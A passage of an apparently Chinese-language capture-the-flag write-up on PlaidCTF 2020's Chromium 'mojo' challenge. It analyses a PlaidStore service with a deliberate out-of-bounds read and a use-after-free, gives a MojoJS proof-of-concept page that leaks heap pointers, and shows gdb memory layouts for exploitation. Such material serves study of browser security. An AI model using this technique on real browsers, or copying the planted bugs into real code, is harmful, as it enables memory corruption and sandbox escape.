RenderFrameHost* render_frame_host_;</span><br><span class="line">  std::map&lt;std::string, std::vector&lt;<span class="type">uint8_t</span>&gt; &gt; data_store_;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line">&#125; <span class="comment">// namespace content</span></span><br></pre></td></tr></table></figure>
<p>对上述代码的具体实现则是如下</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;content/browser/plaidstore/plaidstore_impl.h&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;content/public/browser/render_frame_host.h&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;mojo/public/cpp/bindings/self_owned_receiver.h&quot;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">namespace</span> content &#123;</span><br><span class="line"></span><br><span class="line">PlaidStoreImpl::<span class="built_in">PlaidStoreImpl</span>(</span><br><span class="line">    RenderFrameHost *render_frame_host)</span><br><span class="line">    : <span class="built_in">render_frame_host_</span>(render_frame_host) &#123;&#125;</span><br><span class="line"></span><br><span class="line">PlaidStoreImpl::~<span class="built_in">PlaidStoreImpl</span>() &#123;&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">PlaidStoreImpl::StoreData</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">const</span> std::string &amp;key,</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">const</span> std::vector&lt;<span class="type">uint8_t</span>&gt; &amp;data)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">if</span> (!render_frame_host_-&gt;<span class="built_in">IsRenderFrameLive</span>()) &#123;</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  data_store_[key] = data;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">PlaidStoreImpl::GetData</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">const</span> std::string &amp;key,</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">uint32_t</span> count,</span></span></span><br><span class="line"><span class="params"><span class="function">    GetDataCallback callback)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">if</span> (!render_frame_host_-&gt;<span class="built_in">IsRenderFrameLive</span>()) &#123;</span><br><span class="line">    std::<span class="built_in">move</span>(callback).<span class="built_in">Run</span>(&#123;&#125;);</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">auto</span> it = data_store_.<span class="built_in">find</span>(key);</span><br><span class="line">  <span class="keyword">if</span> (it == data_store_.<span class="built_in">end</span>()) &#123;</span><br><span class="line">    std::<span class="built_in">move</span>(callback).<span class="built_in">Run</span>(&#123;&#125;);</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="function">std::vector&lt;<span class="type">uint8_t</span>&gt; <span class="title">result</span><span class="params">(it-&gt;second.begin(), it-&gt;second.begin() + count)</span></span>; <span class="comment">//oob</span></span><br><span class="line">  std::<span class="built_in">move</span>(callback).<span class="built_in">Run</span>(result);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// static</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">PlaidStoreImpl::Create</span><span class="params">( <span class="comment">//UAF</span></span></span></span><br><span class="line"><span class="params"><span class="function">    RenderFrameHost *render_frame_host,</span></span></span><br><span class="line"><span class="params"><span class="function">    mojo::PendingReceiver&lt;blink::mojom::PlaidStore&gt; receiver)</span> </span>&#123;</span><br><span class="line">  mojo::<span class="built_in">MakeSelfOwnedReceiver</span>(std::<span class="built_in">make_unique</span>&lt;PlaidStoreImpl&gt;(render_frame_host),</span><br><span class="line">                              std::<span class="built_in">move</span>(receiver));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">&#125; <span class="comment">// namespace content</span></span><br></pre></td></tr></table></figure>
<p>而我们的漏洞代码就处于上述的实现中，下面我们来分析越界读漏洞</p>
<h3 id="oob"><a href="#oob" class="headerlink" title="oob"></a>oob</h3><p>oob漏洞处于如下实现的代码中,下面的代码实现了一个写入数据和读取数据的函数，而在在函数PlaidStoreImpl::GetData中，程序并没有对传入的参数count进行判断，因此该函数可以越界读取，返回比实际存储范围更大的数据。</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">PlaidStoreImpl::StoreData</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">const</span> std::string &amp;key,</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">const</span> std::vector&lt;<span class="type">uint8_t</span>&gt; &amp;data)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">if</span> (!render_frame_host_-&gt;<span class="built_in">IsRenderFrameLive</span>()) &#123;</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  data_store_[key] = data;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">PlaidStoreImpl::GetData</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">const</span> std::string &amp;key,</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">uint32_t</span> count,</span></span></span><br><span class="line"><span class="params"><span class="function">    GetDataCallback callback)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">if</span> (!render_frame_host_-&gt;<span class="built_in">IsRenderFrameLive</span>()) &#123;</span><br><span class="line">    std::<span class="built_in">move</span>(callback).<span class="built_in">Run</span>(&#123;&#125;);</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">auto</span> it = data_store_.<span class="built_in">find</span>(key);</span><br><span class="line">  <span class="keyword">if</span> (it == data_store_.<span class="built_in">end</span>()) &#123;</span><br><span class="line">    std::<span class="built_in">move</span>(callback).<span class="built_in">Run</span>(&#123;&#125;);</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="function">std::vector&lt;<span class="type">uint8_t</span>&gt; <span class="title">result</span><span class="params">(it-&gt;second.begin(), it-&gt;second.begin() + count)</span></span>; <span class="comment">//oob</span></span><br><span class="line">  std::<span class="built_in">move</span>(callback).<span class="built_in">Run</span>(result);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h3 id="UAF漏洞"><a href="#UAF漏洞" class="headerlink" title="UAF漏洞"></a>UAF漏洞</h3><p>当PlaidStoreImpl类执行构造函数时，该类的一个实例将会保存传入的render_frame_host原始指针。（注意保留的是原始指针而不是智能指针）</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">PlaidStoreImpl::<span class="built_in">PlaidStoreImpl</span>(</span><br><span class="line">    RenderFrameHost *render_frame_host)</span><br><span class="line">    : <span class="built_in">render_frame_host_</span>(render_frame_host) &#123;&#125;</span><br></pre></td></tr></table></figure>
<p>而我们的PlaidStoreImpl::Create函数内部则会调用mojo::MakeSelfOwnedReceiver函数，该函数会将Mojo管道的一端的Receiver和PlaidStoreImpl实例相关联(注意传入的render_frame_host使用的 unique智能指针类型为PlaidStoreImpl)。这样当Mojo管道关闭或者发生错误的时候，receiver便可以将当前的PlaidStoreImpl实例释放掉，从而达到关联生命周期的目的</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// static</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">PlaidStoreImpl::Create</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    RenderFrameHost *render_frame_host,</span></span></span><br><span class="line"><span class="params"><span class="function">    mojo::PendingReceiver&lt;blink::mojom::PlaidStore&gt; receiver)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    mojo::<span class="built_in">MakeSelfOwnedReceiver</span>(std::<span class="built_in">make_unique</span>&lt;PlaidStoreImpl&gt;(render_frame_host),</span><br><span class="line">                                std::<span class="built_in">move</span>(receiver));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>但是我们不能将render_frame_host所属的RenderFrameHost生命周期与PlaidStoreImpl周期相关联，这就可以导致我们在子进程释放掉render_frame_host之后，但是PlaidStoreImpl仍然存活</p>
<blockquote>
<p>一个render进程中的RenderFrame对应browser进程中的RenderFrameHost。<br>当打开新的tab或iframe时，browser将会对应的创建RenderFrameHost对象<br>释放也是如此，当某个tab或iframe被释放时，对应的RenderFrameHost对象将会被释放。</p>
</blockquote>
<p>这样我们就可以在保证Mojo Pipe不断开的前提下，将render_frame_host析构，之后就可以在PlaidStoreImpl类函数中继续使用render_frame_host，这样就可以达到UAF的目的</p>
<h2 id="调试和利用过程"><a href="#调试和利用过程" class="headerlink" title="调试和利用过程"></a>调试和利用过程</h2><h3 id="oob-1"><a href="#oob-1" class="headerlink" title="oob"></a>oob</h3><p>我们可以先写一段oob的poc，看看我们究竟会泄露出来什么东西</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!-- 调用MojoJs接口时一定要把这些js包含在html中--&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">&quot;mojo_js/mojo/public/js/mojo_bindings.js&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">&quot;mojo_js/third_party/blink/public/mojom/plaidstore/plaidstore.mojom.js&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">dec2hex</span>(<span class="params">dec</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">return</span> <span class="string">&quot;0x&quot;</span> + dec.<span class="title function_">toString</span>(<span class="number">16</span>);</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">bytes2WORD</span>(<span class="params">bytes</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> value = <span class="number">0</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">8</span>; i++) &#123;</span></span><br><span class="line"><span class="language-javascript">            value = value * <span class="number">0x100</span> + bytes[<span class="number">7</span> - i];</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">return</span> value;</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">sucess</span>(<span class="params">message</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&#x27;[+] &#x27;</span> + message);</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">oob</span>(<span class="params"></span>)&#123;</span></span><br><span class="line"><span class="language-javascript">      <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;oob test&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">      <span class="keyword">var</span> pipe = <span class="title class_">Mojo</span>.<span class="title function_">createMessagePipe</span>();</span></span><br><span class="line"><span class="language-javascript">      <span class="comment">//使PlaidStore和接口绑定</span></span></span><br><span class="line"><span class="language-javascript">      <span class="title class_">Mojo</span>.<span class="title function_">bindInterface</span>(</span></span><br><span class="line"><span class="language-javascript">        blink.<span class="property">mojom</span>.<span class="property">PlaidStore</span>.<span class="property">name</span>,</span></span><br><span class="line"><span class="language-javascript">        pipe.<span class="property">handle1</span>,</span></span><br><span class="line"><span class="language-javascript">        <span class="string">&quot;context&quot;</span>,</span></span><br><span class="line"><span class="language-javascript">        <span class="literal">true</span>,</span></span><br><span class="line"><span class="language-javascript">      );</span></span><br><span class="line"><span class="language-javascript">      <span class="keyword">var</span> plaidstorePtr = <span class="keyword">new</span> blink.<span class="property">mojom</span>.<span class="title class_">PlaidStorePtr</span>(pipe.<span class="property">handle0</span>);</span></span><br><span class="line"><span class="language-javascript">      plaidstorePtr.<span class="title function_">storeData</span>(<span class="string">&quot;aaaa&quot;</span>,<span class="keyword">new</span> <span class="title class_">Array</span>(<span class="number">0x10</span>).<span class="title function_">fill</span>(<span class="number">0x31</span>));</span></span><br><span class="line"><span class="language-javascript">      plaidstorePtr.<span class="title function_">getData</span>(<span class="string">&quot;aaaa&quot;</span>,<span class="number">0x18</span>).<span class="property">then</span> (<span class="function"><span class="params">res</span>=&gt;</span>&#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">dec2hex</span>(<span class="title function_">bytes2WORD</span>(res.<span class="property">data</span>.<span class="title function_">slice</span>(<span class="number">0x10</span>, <span class="number">0x18</span>))));</span></span><br><span class="line"><span class="language-javascript">      &#125;)</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="title function_">oob</span>();</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>之后我们运行，运行结果如下图所示，我们可以发现其打印出来了一个很像地址的东西，下面我们来调试一下看一下这个东西到底是什么</p>
<img src="/2023/11/07/plaidctf2020-mojo-writeup/image1.png" class="" title="image1">

<p>我们启动gdb之后，首先输入如下命令来查看函数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; info function PlaidStoreImpl</span><br><span class="line">All functions matching regular expression &quot;PlaidStoreImpl&quot;:</span><br><span class="line"></span><br><span class="line">Non-debugging symbols:</span><br><span class="line">0x00005555591ac170  content::PlaidStoreImpl::~PlaidStoreImpl()</span><br><span class="line">0x00005555591ac170  content::PlaidStoreImpl::~PlaidStoreImpl()</span><br><span class="line">0x00005555591ac190  content::PlaidStoreImpl::~PlaidStoreImpl()</span><br><span class="line">0x00005555591ac1c0  content::PlaidStoreImpl::StoreData(std::__1::basic_string&lt;char, std::__1::char_traits&lt;char&gt;, std::__1::allocator&lt;char&gt; &gt; const&amp;, std::__1::vector&lt;unsigned char, std::__1::allocator&lt;unsigned char&gt; &gt; const&amp;)</span><br><span class="line">0x00005555591ac2b0  content::PlaidStoreImpl::GetData(std::__1::basic_string&lt;char, std::__1::char_traits&lt;char&gt;, std::__1::allocator&lt;char&gt; &gt; const&amp;, unsigned int, base::OnceCallback&lt;void (std::__1::vector&lt;unsigned char, std::__1::allocator&lt;unsigned char&gt; &gt; const&amp;)&gt;)</span><br><span class="line">0x00005555591ac490  content::PlaidStoreImpl::Create(content::RenderFrameHost*, mojo::PendingReceiver&lt;blink::mojom::PlaidStore&gt;)</span><br><span class="line">0x00005555591ac550  base::WeakPtr&lt;mojo::StrongBinding&lt;blink::mojom::PlaidStore&gt; &gt; mojo::MakeSelfOwnedReceiver&lt;blink::mojom::PlaidStore, content::PlaidStoreImpl&gt;(std::__1::unique_ptr&lt;content::PlaidStoreImpl, std::__1::default_delete&lt;content::PlaidStoreImpl&gt; &gt;, mojo::PendingReceiver&lt;blink::mojom::PlaidStore&gt;, scoped_refptr&lt;base::SequencedTaskRunner&gt;)</span><br></pre></td></tr></table></figure>
<p>之后我们将断点下在 content::PlaidStoreImpl::Create函数，然后运行r来进行调试,然后运行单步调试，我们就可以发现PlaidStore的大小为0x28，为什么是0x28我们可以看一下下面这个图片</p>
<img src="/2023/11/07/plaidctf2020-mojo-writeup/image2.png" class="" title="image2">

<p>我们可以发现在<code>mov edi, 0x28</code>这条指令的下面是operator new函数，那么0x28就是我们传入的内存大小，因此我们可以判断其大小为0x28。之后我们继续往下运行，将operator指令运行完之后，返回的$rax就是我们的PlaidStore的地址，我们使用set命令来保存一下rax的值，然后执行fini之后查看plaid实例的布局</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/5gx 27613089091824</span><br><span class="line">0x191d2c5dd0f0: 0x000055555f50a7a0 // vt_table      0x0000191d2c544400 // render_frame_host</span><br><span class="line">0x191d2c5dd100: 0x0000191d2c5dd108 //(map start)data_store     0x0000000000000000</span><br><span class="line">0x191d2c5dd110: 0x0000000000000000 //map end </span><br></pre></td></tr></table></figure>
<p>然后我们执行到storeData结束，查看一下datastore布局</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/30gx 0x0000191d2c60ac80</span><br><span class="line">0x191d2c60ac80: 0x0000000000000000      0x0000000000000000</span><br><span class="line">0x191d2c60ac90: 0x0000191d2c5dd108      0x000055555824ff01</span><br><span class="line">0x191d2c60aca0: 0x0000000061616161 --&gt; key      0x0000000000000000</span><br><span class="line">0x191d2c60acb0: 0x0400000000000000      0x0000191d2c6116b0 --&gt; value1</span><br><span class="line">0x191d2c60acc0: 0x0000191d2c6116c0      0x0000191d2c6116c0</span><br><span class="line">0x191d2c60acd0: 0xffffe6e0790d9942      0xffffe6e079359582</span><br><span class="line">0x191d2c60ace0: 0x4641384341313438      0x3131413232354344</span><br><span class="line">0x191d2c60acf0: 0x3441453636414345      0x4237443438324444</span><br><span class="line">0x191d2c60ad00: 0x3439304234393133      0x4434423336343438</span><br><span class="line">0x191d2c60ad10: 0x0000191d2c616500      0x0000000000000001</span><br><span class="line">pwndbg&gt; x/20gx 0x0000191d2c6116b0</span><br><span class="line">0x191d2c6116b0: 0x3131313131313131 --&gt; 11111     0x3131313131313131</span><br><span class="line">0x191d2c6116c0: 0xffffe6e079342862      0xffffe6e079342812</span><br><span class="line">0x191d2c6116d0: 0xffffe6e079342802      0xfffffffd55553ec2</span><br><span class="line">0x191d2c6116e0: 0xffffe60000000001      0xfffffffd55553ec2</span><br><span class="line">0x191d2c6116f0: 0xffffe60000000002      0xfffffffd55553ec2</span><br><span class="line">0x191d2c611700: 0xffffe60000000001      0xfffffffd55553ec2</span><br></pre></td></tr></table></figure>
<p>为了接着往下查看我们需要先简单了解一下chrome中map的结构以及布局，其使用的std::map的实现如下</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">template</span> &lt;<span class="keyword">class</span> <span class="title class_">_Key</span>, <span class="keyword">class</span> <span class="title class_">_CP</span>, <span class="keyword">class</span> <span class="title class_">_Compare</span>,</span><br><span class="line">          <span class="type">bool</span> = is_empty&lt;_Compare&gt;::value &amp;&amp; !__libcpp_is_final&lt;_Compare&gt;::value&gt;</span><br><span class="line"><span class="keyword">class</span> __map_value_compare</span><br><span class="line">    : <span class="keyword">private</span> _Compare</span><br><span class="line">&#123;</span><br><span class="line"><span class="keyword">private</span>:</span><br><span class="line">...</span><br><span class="line">    <span class="keyword">typedef</span> __tree&lt;__value_type, __vc, __allocator_type&gt;   __base;</span><br><span class="line">    __base __tree_;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>其是我们可以发现里面就一个成员_tree,其实这就是红黑树(rb tree)的实现，map其实是rb tree的一层wrapper，实际的插入删除等，都是在__tree上完成的。<br>所以我们直接看__tree的内存布局即可。</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">template</span> &lt;<span class="keyword">class</span> <span class="title class_">_Tp</span>, <span class="keyword">class</span> <span class="title class_">_Compare</span>, <span class="keyword">class</span> <span class="title class_">_Allocator</span>&gt;</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">__tree</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">private</span>:</span><br><span class="line">    __iter_pointer                                     __begin_node_;</span><br><span class="line">    __compressed_pair&lt;<span class="type">__end_node_t</span>, __node_allocator&gt;  __pair1_;</span><br><span class="line">    __compressed_pair&lt;size_type, value_compare&gt;        __pair3_;</span><br></pre></td></tr></table></figure>
<p>其有三个成员变量，一个是指向起始tree_node的指针，其他两个字段用不到，也就不解释了。<br>那么我们现在就知道了，对于如下impl，其偏移0x10位置处就是保持着map的起始节点，而map是一颗rb tree，所以从这个节点我们就可以索引到其他所有插入的节点了。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/5gx $ps_rax</span><br><span class="line">0x191d2c5dd0f0: 0x000055555f50a7a0      0x0000191d2c544400</span><br><span class="line">0x191d2c5dd100: 0x0000191d2c60ac80      0x0000191d2c60ac80</span><br><span class="line">0x191d2c5dd110: 0x0000000000000001</span><br></pre></td></tr></table></figure>
<p>下面我们来看一下tree_node的代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line">template &lt;class _Pointer&gt; class __tree_end_node;</span><br><span class="line">template &lt;class _VoidPtr&gt; class __tree_node_base;</span><br><span class="line">template &lt;class _Tp, class _VoidPtr&gt; class __tree_node;</span><br><span class="line">...</span><br><span class="line">// node</span><br><span class="line"></span><br><span class="line">template &lt;class _Pointer&gt;</span><br><span class="line">class __tree_end_node</span><br><span class="line">&#123;</span><br><span class="line">public:</span><br><span class="line">    typedef _Pointer pointer;</span><br><span class="line">    pointer __left_;</span><br><span class="line"></span><br><span class="line">    _LIBCPP_INLINE_VISIBILITY</span><br><span class="line">    __tree_end_node() _NOEXCEPT : __left_() &#123;&#125;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line">template &lt;class _VoidPtr&gt;</span><br><span class="line">class __tree_node_base</span><br><span class="line">    : public __tree_node_base_types&lt;_VoidPtr&gt;::__end_node_type</span><br><span class="line">&#123;</span><br><span class="line">    typedef __tree_node_base_types&lt;_VoidPtr&gt; _NodeBaseTypes;</span><br><span class="line"></span><br><span class="line">public:</span><br><span class="line">    typedef typename _NodeBaseTypes::__node_base_pointer pointer;</span><br><span class="line">    typedef typename _NodeBaseTypes::__parent_pointer __parent_pointer;</span><br><span class="line"></span><br><span class="line">    pointer          __right_;</span><br><span class="line">    __parent_pointer __parent_;</span><br><span class="line">    bool __is_black_;</span><br><span class="line"></span><br><span class="line">    _LIBCPP_INLINE_VISIBILITY</span><br><span class="line">    pointer __parent_unsafe() const &#123; return static_cast&lt;pointer&gt;(__parent_);&#125;</span><br><span class="line"></span><br><span class="line">    _LIBCPP_INLINE_VISIBILITY</span><br><span class="line">    void __set_parent(pointer __p) &#123;</span><br><span class="line">        __parent_ = static_cast&lt;__parent_pointer&gt;(__p);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">private:</span><br><span class="line">  ~__tree_node_base() _LIBCPP_EQUAL_DELETE;</span><br><span class="line">  __tree_node_base(__tree_node_base const&amp;) _LIBCPP_EQUAL_DELETE;</span><br><span class="line">  __tree_node_base&amp; operator=(__tree_node_base const&amp;) _LIBCPP_EQUAL_DELETE;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line">template &lt;class _Tp, class _VoidPtr&gt;</span><br><span class="line">class __tree_node</span><br><span class="line">    : public __tree_node_base&lt;_VoidPtr&gt;</span><br><span class="line">&#123;</span><br><span class="line">public:</span><br><span class="line">    typedef _Tp __node_value_type;</span><br><span class="line"></span><br><span class="line">    __node_value_type __value_;</span><br><span class="line"></span><br><span class="line">private:</span><br><span class="line">  ~__tree_node() _LIBCPP_EQUAL_DELETE;</span><br><span class="line">  __tree_node(__tree_node const&amp;) _LIBCPP_EQUAL_DELETE;</span><br><span class="line">  __tree_node&amp; operator=(__tree_node const&amp;) _LIBCPP_EQUAL_DELETE;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
<p>我们可以发现其中一共有五个成员变量，前四个大小是固定的，其整体大小依据__node_value_type的大小来决定，这个node_value_type实际上就是key-value这样一个pair对，在这里就是pair&lt;string,vector<uint8_t>&gt;</p>
